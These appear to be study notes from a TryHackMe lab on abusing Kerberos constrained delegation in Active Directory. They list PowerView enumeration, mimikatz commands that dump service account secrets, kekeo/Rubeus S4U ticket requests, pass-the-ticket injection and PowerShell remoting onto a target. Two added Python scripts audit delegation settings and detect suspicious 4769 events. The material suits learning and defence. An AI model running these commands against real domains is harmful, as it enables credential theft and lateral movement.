Kerberos delegation

Note that "Kerberos delegation" and "permission delegation" are two different terms. When "AD delegation" is mentioned, it usually refers to Kerberos delegation.

Resources

  1. Constrained delegation abuse

  2. PowerShell remoting

  3. PowerView

Important notice

The examples shown below use the kekeo tool, which is no longer maintained and may not work as expected. The commands are nonetheless included to illustrate the basic workflow of the process in a lab environment (the TryHackMe Exploiting AD room), along with explanations based on my understanding.

Rubeus is a tool heavily adapted from the kekeo project and provides similar functionality. For each kekeo command shown, I aim to provide the functionally equivalent Rubeus command.

Constrained vs Unconstrained delegation

  1. Unconstrained

  • service accounts have no limits on delegation

  • this means that they are able to access any service on behalf of the users who authenticate to them

  2. Constrained

  • service accounts can only delegate to certain specified services

  • this means that they can only access those controlled services
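The difference between the two modes shows up directly in the account's AD attributes: unconstrained delegation is the TRUSTED_FOR_DELEGATION bit of userAccountControl, constrained delegation is a non-empty msDS-AllowedToDelegateTo list, and the TRUSTED_TO_AUTH_FOR_DELEGATION bit ("use any authentication protocol") marks the protocol-transition variant. The following audit script is an added example and not part of the original notes or of PowerView; it classifies accounts from those attributes and rates them for review. The account records, SPNs and the set of privileged accounts are constructed sample data; a real audit would pull the attributes with Get-ADObject or ldapsearch.

```python
"""Classify accounts by their Kerberos delegation configuration (added audit example).

The records below are constructed sample data shaped like the AD attributes
userAccountControl and msDS-AllowedToDelegateTo; a real audit would pull them
with Get-ADObject or ldapsearch. Account names, SPNs and the 'privileged' set
are hypothetical.
"""

# userAccountControl bits that govern Kerberos delegation (values from the AD schema).
NORMAL_ACCOUNT = 0x200
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation, "use any authentication protocol"

# Constructed sample accounts (not real data).
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "svc-web", "userAccountControl": NORMAL_ACCOUNT | TRUSTED_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": []},
    {"sAMAccountName": "svc-app", "userAccountControl": NORMAL_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["HTTP/fileserver.lab.local", "WSMAN/fileserver.lab.local"]},
    {"sAMAccountName": "svc-sql", "userAccountControl": NORMAL_ACCOUNT,
     "msDS-AllowedToDelegateTo": ["MSSQLSvc/db01.lab.local:1433"]},
    {"sAMAccountName": "da-admin", "userAccountControl": NORMAL_ACCOUNT,
     "msDS-AllowedToDelegateTo": []},
    {"sAMAccountName": "da-admin2", "userAccountControl": NORMAL_ACCOUNT | NOT_DELEGATED,
     "msDS-AllowedToDelegateTo": []},
]

REMOTE_MGMT_SERVICES = {"HTTP", "WSMAN"}  # SPN classes used by PowerShell remoting


def classify(account):
    """Return the delegation mode implied by the account's attributes."""
    uac = account["userAccountControl"]
    targets = account.get("msDS-AllowedToDelegateTo") or []
    if uac & TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if targets and uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
        return "constrained-protocol-transition"
    if targets:
        return "constrained-kerberos-only"
    return "none"


def audit(accounts, privileged=frozenset()):
    """Produce (account, severity, reason) findings for review."""
    findings = []
    for acct in accounts:
        name = acct["sAMAccountName"]
        mode = classify(acct)
        targets = acct.get("msDS-AllowedToDelegateTo") or []
        if mode == "unconstrained":
            findings.append((name, "HIGH",
                             "unconstrained delegation: tickets of any user authenticating "
                             "to this service can be reused against any other service"))
        elif mode == "constrained-protocol-transition":
            # With protocol transition the service can obtain tickets for users
            # who never authenticated to it, so the target list is the only limit.
            findings.append((name, "HIGH",
                             "constrained delegation with protocol transition to: " + ", ".join(targets)))
        elif mode == "constrained-kerberos-only":
            findings.append((name, "MEDIUM",
                             "constrained delegation (Kerberos only) to: " + ", ".join(targets)))
        # Remote-management SPNs deserve a closer look whatever the mode.
        mgmt = [t for t in targets if t.split("/", 1)[0].upper() in REMOTE_MGMT_SERVICES]
        if mgmt:
            findings.append((name, "INFO",
                             "delegation targets include remote-management SPNs: " + ", ".join(mgmt)))
        if name in privileged and not acct["userAccountControl"] & NOT_DELEGATED:
            findings.append((name, "MEDIUM",
                             "privileged account is not marked 'sensitive and cannot be delegated'"))
    return findings


if __name__ == "__main__":
    for name, severity, reason in audit(SAMPLE_ACCOUNTS, privileged={"da-admin", "da-admin2"}):
        print(f"[{severity}] {name}: {reason}")
```

Protocol transition is rated above Kerberos-only constrained delegation because, with "use any authentication protocol", the service can obtain a ticket for a user who never authenticated to it; with Kerberos-only, the user must first present a forwardable ticket to the service. The last check mirrors the usual mitigation for high-value accounts: the "sensitive and cannot be delegated" flag (or membership in Protected Users) stops their tickets from being delegated at all.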

Exploitation steps

Step 1

Given that we have breached a machine, and gained administrative access, we can first try to retrieve credentials of any service accounts that are present on the current host. To achieve this, we can use cmdlets from PowerSploit:

PS C:\> Import-Module C:\dir\to\PowerSploit\PowerView.ps1
PS C:\> Get-NetUser -TrustedToAuth

Next, we can use mimikatz to dump the secrets:

mimikatz # token::elevate
mimikatz # lsadump::secrets

Step 2

Now that we have the secret (the password), we can use it to retrieve a Ticket Granting Ticket (TGT). Next, we can request a Ticket Granting Service (TGS) ticket for a particular service to which the service account identified in step 1 can delegate.

kekeo # tgt::ask /user:<username> /domain:<domain> /password:<password>

C:\> rubeus.exe s4u ... 
kekeo # tgs::s4u /tgt:<TGT> /user:<username> /service:<servicename>

C:\> rubeus.exe ... 

Step 3

Now that we have retrieved the Ticket Granting Service (TGS) ticket for our desired service, we can use it to perform a Pass-the-Ticket attack, which allows us to authenticate to the service identified earlier.

mimikatz # privilege::debug
mimikatz # kerberos::ptt ...
mimikatz # exit

Exploiting PowerShell remoting

According to the TryHackMe exploiting AD room, PowerShell remoting uses the HTTP and WSMAN services as well. This means that we can use the TGT we have retrieved to create TGS for both HTTP and WSMAN, before performing a Pass-the-Ticket attack, which will allow us to gain a remote session on a target machine.

Note that we have to generate and inject the TGS tickets for both the HTTP and WSMAN services:

mimikatz # kerberos::ptt TGS_http_xxxx
mimikatz # kerberos::ptt TGS_wsman_xxx

mimikatz # exit

Refer to the "PowerShell remoting" resource in the Resources section above.

PS C:\> New-PSSession -ComputerName <computer_name>
...

PS C:\> Enter-PSSession -ComputerName <computer_name>
[xxxx]: PS C:\Users\<username> whoami
user_xxx
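On the defender's side, every TGS request described above reaches the domain controller as a Security event 4769, and a ticket obtained through constrained delegation (the s4u step) carries the delegation chain in the event's TransmittedServices field, which is "-" for a direct request. The following detection is an added example and not part of the original notes or of any of the tools mentioned; it runs over constructed sample 4769 events whose keys follow the event's EventData field names (TargetUserName, ServiceName, IpAddress, TransmittedServices) and flags delegated requests that come from an unknown delegating account, from a host where that account does not run, or that impersonate a privileged user. The PRIVILEGED and EXPECTED_DELEGATORS baselines are hypothetical and would come from the delegation audit and the asset inventory.

```python
"""Flag constrained-delegation ticket requests in 4769 events (added detection example).

The events below are constructed; their keys follow the EventData field names
of Windows Security event 4769. TransmittedServices lists the intermediate
services a delegated request passed through and is "-" for a direct request.
The baselines PRIVILEGED and EXPECTED_DELEGATORS are hypothetical.
"""

# Constructed sample 4769 events (not real logs).
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "alice@LAB.LOCAL", "ServiceName": "FILESERVER$",
     "IpAddress": "10.0.0.21", "TransmittedServices": "-"},                 # ordinary TGS request
    {"EventID": 4769, "TargetUserName": "bob@LAB.LOCAL", "ServiceName": "FILESERVER$",
     "IpAddress": "10.0.0.30", "TransmittedServices": "svc-app@LAB.LOCAL"},  # delegation from the expected host
    {"EventID": 4769, "TargetUserName": "administrator@LAB.LOCAL", "ServiceName": "FILESERVER$",
     "IpAddress": "10.0.0.50", "TransmittedServices": "svc-app@LAB.LOCAL"},  # delegation from elsewhere, privileged user
    {"EventID": 4768, "TargetUserName": "svc-app@LAB.LOCAL", "ServiceName": "krbtgt",
     "IpAddress": "10.0.0.30", "TransmittedServices": "-"},                 # TGT request, out of scope
]

# Hypothetical baselines: accounts that must never be impersonated via delegation,
# and the hosts each delegating service account legitimately runs on.
PRIVILEGED = {"administrator@LAB.LOCAL"}
EXPECTED_DELEGATORS = {"svc-app@LAB.LOCAL": {"10.0.0.30"}}


def delegation_chain(event):
    """Return the delegating services recorded in the event, or [] if none."""
    transited = event.get("TransmittedServices", "-")
    if transited in ("-", ""):
        return []
    return [s.strip() for s in transited.split(",") if s.strip()]


def detect(events, privileged=PRIVILEGED, expected=EXPECTED_DELEGATORS):
    """Return (severity, reason, event) alerts for suspicious delegated ticket requests."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4769:
            continue
        chain = delegation_chain(ev)
        if not chain:
            continue  # plain TGS request, nothing was delegated
        user, src = ev["TargetUserName"], ev["IpAddress"]
        for delegator in chain:
            hosts = expected.get(delegator)
            if hosts is None:
                alerts.append(("HIGH", f"delegation by {delegator}, which is not an approved delegating account", ev))
            elif src not in hosts:
                # The service account's ticket is being used from a machine it does not run on.
                alerts.append(("HIGH", f"{delegator} delegated from {src}, not one of its known hosts", ev))
        if user in privileged:
            alerts.append(("HIGH", f"privileged user {user} impersonated via delegation to {ev['ServiceName']}", ev))
    return alerts


if __name__ == "__main__":
    for severity, reason, ev in detect(SAMPLE_EVENTS):
        print(f"[{severity}] {reason} (source {ev['IpAddress']})")
```

The source-host check is the one that catches the workflow in these notes: the delegating account's tickets are legitimately requested only from the machine the service runs on, so a delegated request for the same SPNs from a different host is worth an alert regardless of which user is impersonated.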
